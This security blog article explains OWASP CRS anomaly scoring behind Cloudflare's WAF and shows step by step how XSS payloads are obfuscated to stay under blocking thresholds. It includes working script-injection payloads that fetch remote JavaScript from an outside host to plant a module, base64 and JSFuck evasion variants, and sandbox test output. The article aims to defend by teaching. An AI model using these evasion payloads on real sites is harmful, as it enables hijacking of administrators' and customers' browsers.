1. How does Cloudflare's WAF work and, by extension, OWASP CRS ?
For the rest of this article, we assume you have already read our other posts and therefore know what a WAF is and what it is used for.
Cloudflare is a good tool that offers a WAF starting with its plan at €240 excl. VAT per year (the free plan does not include one).
However, at that entry price point, the level of protection remains very limited and is often ineffective. Only the €2,400 excl. VAT per year plan provides professional‑grade protection-provided that the configuration - which you must do manually - has been implemented correctly, which is far from always the case.
We'll see why in this article. This is not a critique of Cloudflare as a solution, but rather a questioning of flawed OWASP CRS‑based WAF configurations (including Cloudflare's) deployed by unscrupulous third parties.
To
understand how Cloudflare's WAF works, it is essential to understand what it is built on: largely OWASP CRS, one of the best open‑source WAF solutions available today.
So the goal here is not to explain Cloudflare's internal workings, but to
understand how OWASP CRS works, since it is the core of the WAF.
OWASP CRS provides more than 300 security rules designed by some of the world's best application‑security specialists, grouped into four so‑called paranoia levels.
Every request sent to PrestaShop - for example via a contact form, a signup, or a login - is analyzed against all these rules according to the configured paranoia level.
When a rule detects a sequence considered abnormal or suspicious, an anomaly score is increased.
This score varies based on the severity of the detection, typically from 1 to 5 points per rule.
During an attack, a single request often triggers multiple rules; each one then increases the request's overall score.
The job of the DevSecOps (application security specialist) responsible for your project's security is therefore to constantly arbitrate between the score generated by the rules and the threshold above which the request must be blocked.
While keeping in mind that no security rule exists without, at some point, generating unwanted blockings - also known as false positives.
2. What is WAF Fooling, or how to craft low fingerprint offensive payloads ?
OWASP CRS's official recommendation is to block a request when the anomaly score exceeds 5, which means that a critical rule - or a combination of significant rules - has been triggered.
More and more criminal networks have fully understood that many players do not comply with this requirement. Notably those using Cloudflare.
A defensive protocol isn't a skills exam where a score of 10/20 is “good enough”: it's a dam, and the slightest crack is enough to cause a total collapse. Recent incidents have reminded us of that, collectively.
In application security, rigor isn't optional; it's the bare minimum condition if you hope to contain offensive payloads designed specifically to stay under the radar.
Those same networks have specialized in bypassing WAFs by crafting payloads with the lowest possible anomaly score (low fingerprint payloads). This practice is known as WAF fooling or
How to fool a WAF that isn't properly configured
The offensive payloads shown below - rated from high to critical severity - are published for strictly educational purposes, to help third parties understand how professional criminal networks manage to compromise systems despite the presence of cyber-defense tools sold by unscrupulous providers, such as improperly configured Cloudflare WAFs.
Any use of these payloads outside a legal framework and without explicit authorization is a criminal offense and exposes the perpetrator to legal prosecution.
Let's analyze this in detail by looking at a few common vulnerability classes in our ecosystems: XSS, SQL, PHP, RCE, path traversal, and XXE injections.
2.1/ XSS injections
Let's dive straight in with XSS - in other words, how to remotely take control of the web browsers of PrestaShop site administrators or their customers.
Let's take as an example this category-1 XSS injection (CWE-79), which allows you to automatically install a PrestaShop module containing a disarmed backdoor:
?cnmq=<script src='https://1j.vc/ps_a.js' />
Variants are available for WordPress here: https://1j.vc/wp_a.js / https://1j.vc/wp_b.js
OWASP CRS provides a tool for measuring the score of attack sequences: http://sandbox.coreruleset.org/
Let's test our payload with a WAF configured at
paranoia level 1, also known as PL1. :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=<script src='https://1j.vc/ps_a.js' />"
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)
Please note the payload's score: 15, which corresponds to three critical rules being triggered.
Meaning: if your WAF doesn't block requests with scores of 15 or higher, this payload will get through without any difficulty.
Here's the same example, but with a WAF configured at
paranoia level 2, also known as PL2. - This level also includes the full set of PL1 rules. (Paranoia Level 1) :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=<script src='https://1j.vc/ps_a.js' />"
931130 PL2 Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 35)
Please note the payload's score : 35, which corresponds to seven critical rules being triggered. In other words : if your WAF doesn't block requests with scores of 35 or higher, this payload will get through without any difficulty.
Based on these two tests, you should easily understand why it is strongly recommended to work with a paranoia level of 2 : malicious payloads trigger about twice as many security rules at that level.
However, these payloads are still junior-level; there are many variants that can achieve the same result.
For example, here's this category-2 XSS variant, functionally identical in a context using jQuery - which is the case for virtually all e-commerce sites :
?cnmq=<img src=- onerror="$.getScript('//1j.vc/ps_a.js')" />
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d 'cnmq=<img src=- onerror="\$.getScript(%27//1j.vc/ps_a.js%27)" />'
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)
Please note the payload's score : 10, which corresponds to only two critical rules being triggered. In other words : if your WAF doesn't block requests with scores of 10 or higher, this payload will get through without any difficulty.
Those of you who program in JavaScript have probably noticed that it isn't entirely intellectually honest to test this payload as-is. Indeed, most jQuery loading today is asynchronous; in that context, the $ variable hasn't been initialized yet when the HTML content is loaded.
Here is an adjusted payload, more representative of the threat against jQuery :
?cnmq=<img src=- onerror="setTimeout(() => {$.getScript('//1j.vc')},2000)" />
This time, we'll submit it directly at paranoia level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=%3Cimg%20src%3D-%20onerror%3D%22setTimeout%28%28%29%20%3D%3E%20%7B%24.getScript%28%27%2F%2F1j.vc%27%29%7D%2C2000%29%22%20%2F%3E'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941390 PL1 Javascript method detected
941120 PL2 XSS Filter - Category 2: Event Handler Vector
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 58)
The payload's initial score comes to 58 points. We'll therefore make several adjustments to reduce the number of rules being triggered.
?cnmq=<img src=- onerror="setTimeout(() => {$.getScript(atob(String(/Ly8xai52Yw/).slice(1,-1)))},1000);" a />
To reduce its fingerprint, we crafted the payload to neutralize certain security rules. Let's look at the score at paranoia level 2:
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=%3Cimg%20src%3D-%20onerror%3D%22setTimeout%28%28%29%20%3D%3E%20%7B%24.getScript%28atob%28String%28%2FLy8xai52Yw%2F%29.slice%281%2C-1%29%29%29%7D%2C1000%29%3B%22%20a%20%2F%3E'
932281 PL2 Remote Command Execution: Brace Expansion Found
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941390 PL1 Javascript method detected
941120 PL2 XSS Filter - Category 2: Event Handler Vector
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 38)
The score was reduced by 20 points, dropping from 58 to 38.
However, there's a little secret about WAFs: rules 941160, 941320, and 942430 are very difficult to keep enabled in production. They effectively prohibit sending HTML sequences - yet those are common in e-commerce contexts - and they require you to exhaustively whitelist every page that must allow this kind of content, a constraint that non-professional integrators almost never accept.
In practice, the vast majority of WAFs therefore disable these three rules. Taking that real-world reality into account, the score mechanically drops from 38 to 23 points (38 minus three rules worth 5 points each).
The score actually observed in practice is therefore most often 23 points, a level consistent with this (much more realistic) category-2 XSS variant:
?cnmq=" onerror="setTimeout(() => {$.getScript(atob(String(/Ly8xai52Yw/).slice(1,-1)))},1000);" "
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=%22%20onerror%3D%22setTimeout%28%28%29%20%3D%3E%20%7B%24.getScript%28atob%28String%28%2FLy8xai52Yw%2F%29.slice%281%2C-1%29%29%29%7D%2C1000%29%3B%22%20%22"
932281 PL2 Remote Command Execution: Brace Expansion Found
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941390 PL1 Javascript method detected
941120 PL2 XSS Filter - Category 2: Event Handler Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 28)
Or its JSFuck-obfuscated variant. (https://jsfuck.com/) :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=%22%20onerror%3D%22%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%28%29%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%2B%28%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%2B%5B%5D%5D%29%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B